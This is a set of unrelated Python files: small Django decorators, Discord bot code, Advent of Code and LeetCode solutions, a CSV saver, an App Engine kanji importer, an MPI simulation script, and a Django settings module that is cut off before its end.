spots3.append({'pos': (1e-6*i, 1e-6*j), 'size': 1e-6, 'pen': {'color': 'w', 'width': 2}, 'brush':pg.intColor(i*10+j, 100)})
s3.addPoints(spots3)
w3.addItem(s3)
s3.sigClicked.connect(clicked)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
''' |
# -*- coding: utf-8 -*-
from functools import wraps
from datetime import timedelta
from .models import DataPresence, HitViewByUser
from django.utils import timezone
from django.utils.decorators import available_attrs
from django.db.models import F
def bdg_data_presence(view_func):
    """Decorator: record daily presence for the authenticated user.

    At most once per calendar day, increments the total day counter and
    either extends (yesterday seen) or resets the consecutive-day streak.
    F() expressions are used so the counters are updated atomically in SQL.

    NOTE(review): `request.user.is_authenticated()` called as a method and
    `available_attrs` are pre-Django-1.10/3.0 APIs — this module targets an
    older Django release; confirm before upgrading.
    """
    @wraps(view_func, assigned=available_attrs(view_func))
    def _login_wrapped_view(request, *args, **kwargs):
        if request.user.is_authenticated():
            data_presence, created = DataPresence.objects.get_or_create(user=request.user)
            today = timezone.now().date()
            yesterday = today - timedelta(days=1)
            # Only count once per day.
            if data_presence.last_login != today:
                data_presence.number_days = F('number_days') + 1
                if data_presence.last_login == yesterday:
                    # Streak continues.
                    data_presence.consecutive_days = F('consecutive_days') + 1
                else:
                    # Streak broken (or first ever visit): restart at 1.
                    data_presence.consecutive_days = 1
                data_presence.last_login = today
                data_presence.save()
        return view_func(request, *args, **kwargs)
    return _login_wrapped_view
def calculate_hit_by_user(view_name):
    """Decorator factory: count one hit per user per day for `view_name`.

    Creates (or fetches) a HitViewByUser row keyed on (user, view_name) and
    bumps its counter at most once per calendar day, using an F() expression
    for an atomic SQL-side increment.
    """
    def decorator(view_func):
        @wraps(view_func, assigned=available_attrs(view_func))
        def _hit_wrapped_view(request, *args, **kwargs):
            if request.user.is_authenticated():
                data_view, created = HitViewByUser.objects.get_or_create(user=request.user,
                                                                         view_name=view_name)
                today = timezone.now().date()
                # Only count the first hit of the day.
                if data_view.date_last_hit != today:
                    data_view.hits = F('hits') + 1
                    data_view.date_last_hit = today
                    data_view.save()
            return view_func(request, *args, **kwargs)
        return _hit_wrapped_view
    return decorator
|
class OrkgResponse(object):
    """Lightweight wrapper capturing the interesting parts of an HTTP response."""

    def __init__(self, response):
        # Snapshot the fields we need; `content` is the parsed JSON body.
        self.status_code = response.status_code
        self.content = response.json()
        self.url = response.url

    @property
    def succeeded(self):
        """True when the status code is in the 2xx range."""
        first_digit = str(self.status_code)[0]
        return first_digit == '2'
|
"""
Solutions for day 6 of 2020's Advent of Code
"""
def part_a(data) -> int:
    """
    Solution for part a: total count of distinct answers per group.

    Parameters
    ----------
    data: str

    Returns
    -------
    answer: int
    """
    total = 0
    for group in data.split('\n\n'):
        # Any question answered by anyone in the group counts once.
        distinct = set(group.replace('\n', ''))
        total += len(distinct)
    return total
def part_b(data, **_) -> int:
    """
    Solution for part b: total count of answers shared by everyone in a group.

    Parameters
    ----------
    data: str

    Returns
    -------
    answer: int
    """
    total = 0
    for group in data.split('\n\n'):
        # Intersect every person's answer set within the group.
        person_sets = [set(person) for person in group.split('\n')]
        total += len(set.intersection(*person_sets))
    return total
|
import unittest
from neural_bezier.dataset import BezierDataset
class BezierDatasetTest(unittest.TestCase):
    """Unit tests for BezierDataset iteration."""

    def test_iter_seed(self):
        # A dataset of length 16 at image size 128 should yield
        # (params, image) pairs: 10 curve parameters and a 128x128 image.
        dataset = iter(BezierDataset(length=16, size=128))
        params, img = next(dataset)
        self.assertEqual((10,), params.shape)
        self.assertEqual((128, 128), img.shape)
|
"""
Imports
"""
from .datacontroller import UserStore, QuestionStore, AnswerStore
# Application-wide store singletons, shared by every importer of this package.
store = UserStore()
questionstore = QuestionStore()
answerstore = AnswerStore()
|
"""Phish Stats"""
from . import utils
# from .models import Show, Collection
from .show import Show
from .collection import Collection
|
# r1
import csv
import logging
from helpers.save.data_saver import DataSaver
logger = logging.getLogger('ddd_site_parse')
class DataSaverCSV(DataSaver):
    """DataSaver backend that writes parsed rows to a CSV file.

    Optional entries read from `params`:
        newline:       newline argument for open() (default '')
        csv_delimiter: field delimiter (default ';')
    """

    def __init__(self, params: {}):
        super().__init__(params)
        self.ext = 'csv'
        self.newline = params.get('newline', '')
        self.csv_delimiter = params.get('csv_delimiter', ';')

    def _save(self, data: [], data_fields: [], output_path: str, params: {}) -> None:
        """Write the `data_fields` columns of every row in `data` to `output_path`."""
        # BUG FIX: the except branch previously logged through the root
        # logger (`logging.debug`), bypassing the handlers configured on
        # this module's named 'ddd_site_parse' logger.
        log = logging.getLogger('ddd_site_parse')
        with open(output_path, 'w', newline=self.newline, encoding=self.encoding) as output:
            writer = csv.writer(output, delimiter=self.csv_delimiter)
            self._check_data_fields(data, data_fields)
            for row in data:
                try:
                    writer.writerow([row[field] for field in data_fields])
                except UnicodeEncodeError as e:
                    log.debug(f'[E: {e}] Write row error, trying fix encoding: [{row}]')
                    # Re-encode the offending values in place, then retry once.
                    DataSaver.fix_row_encoding(row, self.encoding)
                    writer.writerow([row[field] for field in data_fields])
|
from flask_security.forms import LoginForm
class BabelLoginForm(LoginForm):
    """Placeholder subclass of flask_security's LoginForm.

    Currently identical to LoginForm; presumably a hook for Babel/i18n
    customization of labels and messages — confirm intended use.
    """
    pass
|
#25adecimal (vquex)
ls = '0123456789ABCDEFGHIJKLMNO'
e = 0
p = 0
t = int(raw_input('to vquex: '))
r = t % 25
q = t / 25
while p < q:
e += 1
p += 1
print str(e) + ls[r]
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/05a_inference_anime_heads.ipynb (unless otherwise specified).
__all__ = []
# Cell
import torch
import matplotlib.pyplot as plt
from fastcore.all import *
from .torch_utils import Normalizer
from .data_anime_heads import Tokenizer
from .model import Anime_Export
# Internal Cell
# Module-level singletons shared by the inference helpers below.
normalizer = Normalizer()
tokenizer = Tokenizer()
# Internal Cell
def decode_img(img):
    "img: (bs, 3, _, _), returns: (bs, _, _, 3)"
    # Undo normalization and move channels last (HWC) for plotting.
    imgs = normalizer.decode(img).permute(0, 2, 3, 1).cpu()
    return imgs
# Internal Cell
def get_attn_w(model):
    "return: (bs, seq_len, w, h)"
    # Attention weights from the last attention block of the generator.
    attn_w = model.g_net.gs_attn[-1].conv[0].attn_w # (bs, h, w, seq_len)
    return attn_w.permute(0, 3, 1, 2) # (bs, seq_len, h, w)
# Cell
@patch
@torch.no_grad()
def predict(self: Anime_Export, cap):
    ''' cap: 'white hair yellow eyes'
        returns: img: (64, 64, 3), attn_w: (2, 64, 64) '''
    # Tokenize the caption and wrap it as a batch of one.
    cap, cap_len = tokenizer.encode(cap)
    cap = torch.tensor([cap])
    cap_len = torch.tensor([cap_len])
    self.eval()  # inference mode: freeze dropout/batch-norm behavior
    img = self.forward(cap, cap_len)
    # img = self.small_forward(cap, cap_len)
    img = decode_img(img)
    attn_w = get_attn_w(self)
    # Strip the batch dimension before returning.
    return img[0], attn_w[0]
# Internal Cell
def show_pred(img, cap):
    # Render a single predicted image with its caption as the title.
    fig, axis = plt.subplots(nrows=1, ncols=1, figsize=(2, 2))
    axis.imshow(img)
    axis.set_title(cap)
# Internal Cell
def show_pred_withattn(img, attn_w, cap):
    ''' img: (64, 64, 3), attn_w: (2, 64, 64), cap: 'white hair yellow eyes' '''
    # Split the caption into its two tags (first two words / remaining words).
    words = cap.split()
    tags = [' '.join(words[:2]), ' '.join(words[2:])]
    fig, ax = plt.subplots(nrows=1, ncols=3, figsize=(6, 2))
    axs = ax.flatten()
    # Panel 0: the generated image; panels 1-2: one attention map per tag.
    axs[0].imshow(img)
    for panel, tag in enumerate(tags, start=1):
        axs[panel].set_title(tag)
        axs[panel].imshow(attn_w[panel - 1])
# Cell
@patch
def pred_and_show(self: Anime_Export, cap, with_attn=False):
    "cap: 'white hair yellow eyes' "
    # Run inference, then display either image-only or image + attention maps.
    img, attn_w = self.predict(cap)
    show_pred_withattn(img, attn_w, cap) if with_attn else show_pred(img, cap)
#!/usr/bin/env python
import os
import os.path as osp
import gc
import time
from mpi4py import MPI
import matplotlib.pyplot as plt
import pprint
import argparse
import pyathena as pa
from ..util.split_container import split_container
from ..plt_tools.make_movie import make_movie
if __name__ == '__main__':
    # MPI driver: each rank processes a disjoint subset of snapshot numbers
    # from a TIGRESS-NCR simulation; rank 0 optionally assembles movies.
    movie = False
    COMM = MPI.COMM_WORLD
    #basedir_def = '/tigress/jk11/TIGRESS-NCR/R8_8pc_NCR_test6/'
    #basedir_def = '/perseus/scratch/gpfs/jk11/TIGRESS-NCR/LGR4_4pc_NCR_oldvl/'
    #basedir_def = '/tigress/changgoo/TIGRESS-NCR/R8_4pc_NCR.cori'
    basedir_def = '/tigress/jk11/TIGRESS-NCR/R8_4pc_NCR.cori'
    #basedir_def = '/tigress/jk11/TIGRESS-NCR/LGR4_2pc_NCR.cori'
    #basedir_def = '/tiger/scratch/gpfs/jk11/TIGRESS-NCR/LGR4_4pc_NCR'
    # savdir = '/tigress/jk11/tmp4/'
    # savdir_pkl = '/tigress/jk11/tmp3/'
    savdir = None
    savdir_pkl = None
    parser = argparse.ArgumentParser()
    parser.add_argument('-b', '--basedir', type=str,
                        default=basedir_def,
                        help='Name of the basedir.')
    args = vars(parser.parse_args())
    # NOTE(review): at module scope locals() is globals(), so this injects
    # `basedir` into the namespace — fragile inside a function; works here.
    locals().update(args)
    s = pa.LoadSimTIGRESSNCR(basedir, verbose=False)
    nums = s.nums[::5]  # process every 5th snapshot
    if COMM.rank == 0:
        print('basedir, nums', s.basedir, nums)
        nums = split_container(nums, COMM.size)
    else:
        nums = None
    # Rank 0 scatters one chunk of snapshot numbers to each rank.
    mynums = COMM.scatter(nums, root=0)
    print('[rank, mynums]:', COMM.rank, mynums)
    time0 = time.time()
    for num in mynums:
        print(num, end=' ')
        # # prj = s.read_prj(num, force_override=False)
        # # slc = s.read_slc(num, force_override=False)
        # try:
        #     fig = s.plt_snapshot(num, savdir_pkl=savdir_pkl, savdir=savdir)
        #     plt.close(fig)
        #     fig = s.plt_pdf2d_all(num, plt_zprof=False, savdir_pkl=savdir_pkl, savdir=savdir)
        #     plt.close(fig)
        # except KeyError:
        #     fig = s.plt_snapshot(num, savdir_pkl=savdir_pkl, savdir=savdir, force_override=True)
        #     plt.close(fig)
        #     fig = s.plt_pdf2d_all(num, plt_zprof=False, savdir_pkl=savdir_pkl, savdir=savdir, force_override=True)
        #     plt.close(fig)
        # n = gc.collect()
        # print('Unreachable objects:', n, end=' ')
        # print('Remaining Garbage:', end=' ')
        # pprint.pprint(gc.garbage)
        print('read_H2eq', end=' ')
        r = s.read_H2eq(num, force_override=False)
        # Explicit GC pass per snapshot to keep per-rank memory bounded.
        n = gc.collect()
        print('Unreachable objects:', n, end=' ')
        print('Remaining Garbage:', end=' ')
        pprint.pprint(gc.garbage)
    # Make movies
    if COMM.rank == 0 and movie:
        fin = osp.join(s.basedir, 'snapshots/*.png')
        fout = osp.join(s.basedir, 'movies/{0:s}_snapshots.mp4'.format(s.basename))
        make_movie(fin, fout, fps_in=15, fps_out=15)
        from shutil import copyfile
        copyfile(fout, osp.join('/tigress/jk11/public_html/movies',
                                osp.basename(fout)))
    COMM.barrier()
    if COMM.rank == 0:
        print('')
        print('################################################')
        print('# Do tasks')
        print('# Execution time [sec]: {:.1f}'.format(time.time()-time0))
        print('################################################')
        print('')
|
from typing import Awaitable, Callable, Union
from dis_snek.models.discord_objects.role import Role
from dis_snek.models.snowflake import Snowflake_Type, to_snowflake
from dis_snek.models.context import Context
# Signature shared by all command checks: an async predicate over Context.
TYPE_CHECK_FUNCTION = Callable[[Context], Awaitable[bool]]


def has_role(role: Union[Snowflake_Type, Role]) -> TYPE_CHECK_FUNCTION:
    """
    Check if the user has the given role

    Args:
        role: The Role or role id to check for
    """

    async def check(ctx: Context) -> bool:
        # Role checks only make sense inside a guild.
        if ctx.guild is None:
            return False
        # NOTE(review): unlike has_any_role below, the argument is passed
        # through without to_snowflake() — confirm ctx.author.has_role
        # accepts both Role objects and raw ids.
        return ctx.author.has_role(role)

    return check
def has_any_role(*roles: Union[Snowflake_Type, Role]) -> TYPE_CHECK_FUNCTION:
    """
    Checks if the user has any of the given roles

    Args:
        *roles: The Role(s) or role id(s) to check for
    """

    async def check(ctx: Context) -> bool:
        # Role checks only make sense inside a guild.
        if ctx.guild is None:
            return False
        # Idiom fix: return the any() result directly instead of the
        # `if any(...): return True / return False` pattern.
        return any(ctx.author.has_role(to_snowflake(r)) for r in roles)

    return check
def has_id(user_id) -> TYPE_CHECK_FUNCTION:
    """
    Checks if the author has the desired ID.

    parameters:
        user_id: the id the invoking author must have
    """

    async def check(ctx: Context) -> bool:
        author_id = ctx.author.id
        return author_id == user_id

    return check
def is_owner() -> TYPE_CHECK_FUNCTION:
    """
    Is the author the owner of the bot.

    Team-owned applications count any team member as an owner.
    """

    async def check(ctx: Context) -> bool:
        # Team-owned application: membership in the team grants ownership.
        if ctx.bot.app.team:
            return ctx.bot.app.team.is_in_team(ctx.author.id)
        # Single-owner application: compare ids directly.
        return ctx.author.id == ctx.bot.owner.id

    return check
def guild_only() -> TYPE_CHECK_FUNCTION:
    """
    This command may only be ran in a guild
    """

    async def check(ctx: Context) -> bool:
        in_guild = ctx.guild is not None
        return in_guild

    return check
def dm_only() -> TYPE_CHECK_FUNCTION:
    """
    This command may only be ran in a dm
    """

    async def check(ctx: Context) -> bool:
        outside_guild = ctx.guild is None
        return outside_guild

    return check
|
import discord
from discord_components import DiscordComponents
from discord.ext import commands
from dotenv import load_dotenv
import os
# Load environment variables (e.g. TOKEN) from a local .env file.
load_dotenv()
# global settings
bot = commands.Bot(command_prefix=commands.when_mentioned, description='poe trade bot!')
DiscordComponents(bot)  # enable discord_components buttons/selects on this bot
cogs_folder = 'cogs'  # directory scanned for extension modules
@bot.event
async def on_ready():
    """Log the bot's identity once connected, then load all cogs."""
    print('Logged in as')
    print(f'username: {bot.user.name}')
    print(f'id: {bot.user.id}')
    print('------' * 5)
    load_cogs()
    print('------' * 5)
@bot.event
async def on_command_error(ctx, error):
    """Reply with a usage hint and the error details when a command fails."""
    await ctx.send('嘔幹!你在亂打三小拉!\n可以使用 help 指令來查看可用指令。')
    await ctx.send(f"錯誤訊息:\n{error}")
def load_cogs():
    """Load every .py file in the cogs folder as a bot extension."""
    for filename in os.listdir(cogs_folder):
        if filename.endswith('.py'):
            extension = filename[:-3]  # strip the '.py' suffix
            try:
                bot.load_extension(f'cogs.{extension}')
                print('Success to load extension {}'.format(extension))
            except Exception as e:
                # Keep loading the remaining cogs; report the failure type.
                exc = '{}: {}'.format(type(e).__name__, e)
                print('Failed to load extension {}\n{}'.format(extension, exc))
# Start the bot; blocks until the process is stopped.
bot.run(os.getenv("TOKEN"))
|
from PLC.Faults import *
from PLC.Method import Method
from PLC.Parameter import Parameter, Mixed
from PLC.BootStates import BootState, BootStates
from PLC.Auth import Auth
class GetBootStates(Method):
    """
    Returns an array of all valid node boot states.
    """

    # Any authenticated role may call this method.
    roles = ['admin', 'pi', 'user', 'tech', 'node']

    accepts = [
        Auth()
    ]

    returns = [BootState.fields['boot_state']]

    def call(self, auth):
        # Extract just the 'boot_state' string from each BootStates row.
        return [boot_state['boot_state'] for boot_state in BootStates(self.api)]
|
# -*- coding:utf-8 -*-
#
# Author : TangHanYi
# E-mail : thydeyx@163.com
# Create Date : 16-10-28 16:06:01
# File Name : Word_Search.py
# Desc :
class Solution(object):
    """LeetCode 'Word Search': find a word via DFS over adjacent board cells,
    using each cell at most once per path."""

    def dfs(self, board, x, y, word, i):
        """Return True if word[i:] can be traced starting at board[x][y]."""
        # All characters matched.
        if i == self.w_l:
            return True
        # Out of bounds or character mismatch.
        if x < 0 or y < 0 or x >= self.n or y >= self.m or ord(board[x][y]) != ord(word[i]):
            return False
        # Temporarily mark the cell visited by flipping its low 8 bits, so it
        # can never match a word character while on the current path.
        board[x][y] = chr((ord(board[x][y]) ^ 255))
        ret = (self.dfs(board, x + 1, y, word, i + 1)
               or self.dfs(board, x - 1, y, word, i + 1)
               or self.dfs(board, x, y + 1, word, i + 1)
               or self.dfs(board, x, y - 1, word, i + 1))
        # Restore the cell (XOR is its own inverse).
        board[x][y] = chr((ord(board[x][y]) ^ 255))
        return ret

    def exist(self, board, word):
        """Return True if `word` exists in `board` as a path of adjacent cells."""
        self.w_l = len(word)
        # BUG FIX: was `if self.w_l < 0`, which is impossible for len();
        # an empty word should match trivially, even on an empty board.
        if self.w_l == 0:
            return True
        self.n = len(board)
        if self.n == 0:
            return False
        self.m = len(board[0])
        if self.m == 0:
            return False
        for i in range(self.n):
            for j in range(self.m):
                if self.dfs(board, i, j, word, 0) == True:
                    return True
        return False
if __name__ == "__main__":
    # Ad-hoc smoke test (Python 2 print syntax). Expected: True, True, False.
    s = Solution()
    board = [
        ['A','B','C','E'],
        ['S','F','C','S'],
        ['A','D','E','E']
    ]
    word = ["ABCCED", "SEE", "ABCB"]
    for w in word:
        print s.exist(board, w)
|
import cgi
import os
import sys
import wsgiref.handlers
import datetime
from google.appengine.api import users
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.db import djangoforms
# Helper Classes
from xml.dom.minidom import parse, Node
from kanji import Kanji
from statistics import Statistics
import mugenjiForms, mugenjiUsers
import mugenjiDb
class AdminPage(webapp.RequestHandler):
    """Admin landing page: lists up to 50 kanji, optionally filtered by level."""

    def get(self):
        reqLevel = self.request.get("level")
        greeting = mugenjiUsers.User().greeting()
        isAdmin = mugenjiUsers.User().isAdmin()
        isLoggedIn = mugenjiUsers.User().isLoggedIn()
        user = None
        if isLoggedIn:
            # NOTE(review): `User` is not imported or defined in this module —
            # this raises NameError for logged-in users; likely meant a class
            # from mugenjiDb or mugenjiUsers. Confirm and fix.
            user = User().get(mugenjiUsers.User().getEmail())
        try:
            # Fall back to level 0 when the query parameter is missing/invalid.
            reqLevel = int(reqLevel)
            kanjis = Kanji().fetch(reqLevel, 50)
        except:
            kanjis = Kanji().fetch(0, 50)
        template_values = {
            'isAdmin': isAdmin,
            'isLoggedIn': isLoggedIn,
            'user': user,
            'greeting': greeting,
            'kanjis': kanjis
        }
        path = os.path.join(os.path.dirname(__file__), '..', 'templates', 'admin', 'admin.html')
        self.response.out.write(template.render(path, template_values))
class AdminLoadPage(webapp.RequestHandler):
    """Imports kanji from a KANJIDIC2-style XML file into the datastore."""

    def getText(self, nodeList):
        # Concatenate the text content of all TEXT_NODE children.
        t = []
        for node in nodeList:
            if node.nodeType == node.TEXT_NODE:
                t.append(node.data)
        return ''.join(t)

    def get(self):
        greeting = mugenjiUsers.User().greeting()
        isAdmin = mugenjiUsers.User().isAdmin()
        isLoggedIn = mugenjiUsers.User().isLoggedIn()
        user = None
        if isLoggedIn:
            # NOTE(review): `User` is not imported or defined in this module —
            # this raises NameError for logged-in users. Confirm intended class.
            user = User().get(mugenjiUsers.User().getEmail())
        # dom1 = parse(os.path.join(os.path.dirname(__file__), '..', 'data', 'kanjidic2.xml'))
        dom1 = parse(os.path.join(os.path.dirname(__file__), '..', 'data', 'test.xml'))
        characters = dom1.getElementsByTagName('character')
        # Per-JLPT-level counters (levels 1..5).
        levelCount = {1:0,2:0,3:0,4:0,5:0}
        for character in characters:
            kanjiName = None
            onYomi = None
            kunYomi = None
            meaning = None
            strokes = None
            note = None  # NOTE(review): never assigned below; apparently unused
            jlptLevel = None
            for param in character.childNodes:
                if param.nodeType == Node.ELEMENT_NODE:
                    if param.localName == 'literal':
                        # The kanji character itself.
                        kanjiName = self.getText(param.childNodes)
                    elif param.localName == 'misc':
                        for p in param.childNodes:
                            if p.localName == 'stroke_count':
                                strokes = int(self.getText(p.childNodes))
                            if p.localName == 'jlpt':
                                jlptLevel = int(self.getText(p.childNodes))
                    elif param.localName == 'reading_meaning':
                        for p in param.childNodes:
                            if p.localName == 'rmgroup':
                                # Collect meanings (attribute-less only) and
                                # on/kun readings from this group.
                                m = []
                                o = []
                                k = []
                                for p2 in p.childNodes:
                                    if p2.localName == 'meaning' and not p2.attributes.keys():
                                        m.append(self.getText(p2.childNodes))
                                    if p2.localName == 'reading' and p2.attributes['r_type']:
                                        if p2.attributes['r_type'].value == 'ja_on':
                                            o.append(self.getText(p2.childNodes))
                                    if p2.localName == 'reading' and p2.attributes['r_type']:
                                        if p2.attributes['r_type'].value == 'ja_kun':
                                            k.append(self.getText(p2.childNodes))
                                meaning = ', '.join(m)
                                onYomi = ', '.join(o)
                                kunYomi = ', '.join(k)
            # Persist the parsed kanji and tally its JLPT level.
            Kanji().put(kanjiName, meaning, strokes, jlptLevel, onYomi, kunYomi)
            if jlptLevel in levelCount:
                levelCount[jlptLevel] = levelCount[jlptLevel] + 1
        for n, v in levelCount.items():
            Statistics().put('levelCount'+str(n), v)
        # NOTE(review): template_values is built but never rendered — the
        # handler redirects instead; presumably leftover from a template view.
        template_values = {
            'isAdmin': isAdmin,
            'isLoggedIn': isLoggedIn,
            'user': user,
            'greeting': greeting,
        }
        self.redirect('/admin/admin')
class AdminDeletePage(webapp.RequestHandler):
    """Deletes every stored Kanji entity, then returns to the admin page."""

    def get(self):
        for kanji in Kanji().fetch(0):
            kanji.delete()
        self.redirect('/admin/admin')
|
"""Basic settings for EveryVoter project"""
# pylint: disable=invalid-name
import os
import environ
# django-environ declarations: NAME=(cast, default). Each setting is read
# from the process environment; names used below without defaults here
# (SECRET_KEY, DATABASE_URL via env.db()) must be set in the environment.
env = environ.Env(
    DEBUG=(bool, False),
    ALLOWED_HOSTS=(list, []),
    APP_NAME=(str, 'everyvoter-default'),
    TIME_ZONE=(str, 'US/Eastern'),
    LANGUAGE_CODE=(str, 'en-us'),
    KEY_PREFIX=(str, ''),
    CSRF_COOKIE_NAME=(str, 'everyvoter_csrftoken'),
    SESSION_COOKIE_NAME=(str, 'everyvoter_sessionid'),
    SESSION_ENGINE=(str, 'django.contrib.sessions.backends.cached_db'),
    SESSION_SERIALIZER=(
        str, 'django.contrib.sessions.serializers.JSONSerializer'),
    SESSION_EXPIRE_AT_BROWSER_CLOSE=(bool, False),
    SESSION_COOKIE_SECURE=(bool, False),
    SESSION_COOKIE_AGE=(int, 31536000),
    AWS_ACCESS_KEY_ID=(str, ''),
    AWS_SECRET_ACCESS_KEY=(str, ''),
    AWS_DEFAULT_REGION=(str, 'us-east-1'),
    DEFAULT_FROM_EMAIL=(str, 'app@everyvoter.us'),
    EMAIL_ACTIVE=(bool, False),
    SES_FEEDBACK_TOPIC_ARN=(str, ''),
    HIREFIRE_TOKEN=(str, ''),
    HIREFIRE_QUEUES=(list, ['default', 'bulk', 'bulk_priority', 'user_import',
                            'high_memory', 'feedback']),
    DEMOCRACY_WORKS_API_KEY=(str, ''),
    DEMOCRACY_WORKS_API_URL=(str, 'http://127.0.0.1:8000/'),
    DEBUG_TOOLBAR_IPS=(list, ['127.0.0.1']),
    CORS_ORIGIN_REGEX_WHITELIST=(list, []),
    CORS_ORIGIN_WHITELIST=(list, ['localhost:8000', '127.0.0.1:8000']),
    SES_CONFIGURATIONSET_NAME=(str, 'everyvoter'),
    SECURE_SSL_REDIRECT=(bool, False)
)
# Project root directory (two levels up from this settings module).
BASE_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../'))

####
# Secret Key Settings
SECRET_KEY = env('SECRET_KEY')

####
# Core Application Settings
DEBUG = env('DEBUG')
ROOT_URLCONF = 'everyvoter.urls'
WSGI_APPLICATION = 'everyvoter.wsgi.application'
ALLOWED_HOSTS = env('ALLOWED_HOSTS')
SECURE_SSL_REDIRECT = env('SECURE_SSL_REDIRECT')

#####
# Application name (i.e. `everyvoter-prod`, `everyvoter-staging`, etc)
APP_NAME = env('APP_NAME')

####
# Database Settings
# env.db() parses the DATABASE_URL environment variable.
DATABASES = {
    'default': env.db(),
}
#####
# Cache Settings

# Attempt to get the memcache info from Heroku.
try:
    # `django-heroku-memcachify` requires memcache to work. Since we only
    # need it on heroku and don't want to require libmemcached on dev
    # machines, we'll only use it if it's installed
    from memcacheify import memcacheify
    default_cache = memcacheify()['default']

    # memcacheify will use the LocMemCache if there is no heroku cache. So if
    # we see the 'LocMemCache' we know that memcachify is not running on a
    # heroku dyno that is setup for memcached
    # pylint: disable=line-too-long
    if default_cache['BACKEND'] == 'django.core.cache.backends.locmem.LocMemCache':
        default_cache = env.cache()
except ImportError:
    # If `django-heroku-memcachify` is not installed, just use the cache
    # defined in the environment
    default_cache = env.cache()

CACHES = {
    'default': default_cache,
}

# Prefix for every cache key (lets multiple deploys share one cache server).
KEY_PREFIX = env('KEY_PREFIX')
####
# Installed Apps Settings
# NOTE(review): ordering below is deliberate in at least two places (see the
# inline comments); keep it when adding new apps.
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'corsheaders',
    'rest_framework',
    'django_filters',
    'crispy_forms',
    'django_celery_results',
    'django_celery_beat',
    # `django.contrib.auth` has to be after `accounts` because we override
    # `django.contrib.auth` management commands.
    'accounts',
    'django.contrib.auth',
    'manage',
    'api',
    'location',
    'branding',
    'election',
    'blocks',
    'geodataset',
    'mailer',
    'feedback',
    'staff',
    'notifications',
    'user_import',
    'democracy_consumer',
    'everyvoter_common',
    'rawpaginator',
    'hirefire',
    # NOTE(review): 'collectfast' appears before 'django.contrib.staticfiles';
    # collectfast's docs require that ordering — confirm before reordering.
    'collectfast',
    'django.contrib.staticfiles',
    'django_nose',
    'clear_cache',
    'sekizai',
    'debug_toolbar'
]
# Middleware runs top-down for requests and bottom-up for responses.
MIDDLEWARE = [
    'debug_toolbar.middleware.DebugToolbarMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'branding.middleware.BrandingMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'accounts.middleware.NewRelicUserMiddleware',
    'manage.middleware.RestrictAdminMiddleware',
]
####
# Template settings
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            'templates'
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                'sekizai.context_processors.sekizai',
                'branding.context_processors.organization.organization'
            ]
        },
    },
]
####
# Custom authentication model setting
AUTH_USER_MODEL = 'accounts.User'
AUTHENTICATION_BACKENDS = (
    'branding.auth_backends.BrandedBackend',)
####
# Authentication
LOGIN_URL = '/manage/login/'
####
# Session & CSRF Settings
CSRF_COOKIE_NAME = env('CSRF_COOKIE_NAME')
SESSION_COOKIE_NAME = env('SESSION_COOKIE_NAME')
SESSION_ENGINE = env('SESSION_ENGINE')
SESSION_SERIALIZER = env('SESSION_SERIALIZER')
SESSION_EXPIRE_AT_BROWSER_CLOSE = env('SESSION_EXPIRE_AT_BROWSER_CLOSE')
# 31536000 seconds = 365 days.
SESSION_COOKIE_AGE = env('SESSION_COOKIE_AGE')
# NOTE(review): SESSION_COOKIE_SECURE is declared in the Env schema above but
# never assigned to a setting in this module — confirm it is read elsewhere
# or is an unfinished setting.
####
# Password validation
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.'
                'UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.'
                'MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.'
                'CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.'
                'NumericPasswordValidator',
    },
]
####
# File Upload Handling
FILE_UPLOAD_HANDLERS = [
    'django.core.files.uploadhandler.TemporaryFileUploadHandler',
]
####
# API Settings
REST_FRAMEWORK = {
    'DEFAULT_PERMISSION_CLASSES': [
        'rest_framework.permissions.IsAdminUser',
    ],
    'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',)
}
####
# CORS Settings
CORS_ORIGIN_REGEX_WHITELIST = env('CORS_ORIGIN_REGEX_WHITELIST')
# Also allow some standard dev URLs
CORS_ORIGIN_WHITELIST = env('CORS_ORIGIN_WHITELIST')
####
# Amazon Web Services/Boto Settings
# AN AWS KEY IS NOT REQUIRED FOR DEVELOPMENT
# More configurations related to S3 can be found in `storage_settings.py` but
# since your code may rely on non-S3 parts of AWS it might be useful here.
AWS_ACCESS_KEY_ID = env('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = env('AWS_SECRET_ACCESS_KEY')
AWS_DEFAULT_REGION = env('AWS_DEFAULT_REGION')
####
# Email Server Settings
SES_CONFIGURATIONSET_NAME = env('SES_CONFIGURATIONSET_NAME')
DEFAULT_FROM_EMAIL = env('DEFAULT_FROM_EMAIL')
EMAIL_ACTIVE = env('EMAIL_ACTIVE')
####
# Email Feedback Settings
SES_FEEDBACK_TOPIC_ARN = env('SES_FEEDBACK_TOPIC_ARN')
####
# Geocod.io Key
# No default in the Env schema: required in the environment.
GEOCODIO_KEY = env('GEOCODIO_KEY')
####
# HireFire Settings
HIREFIRE_TOKEN = env('HIREFIRE_TOKEN')
HIREFIRE_QUEUES = env('HIREFIRE_QUEUES')
####
# DemocracyWorks API Settings
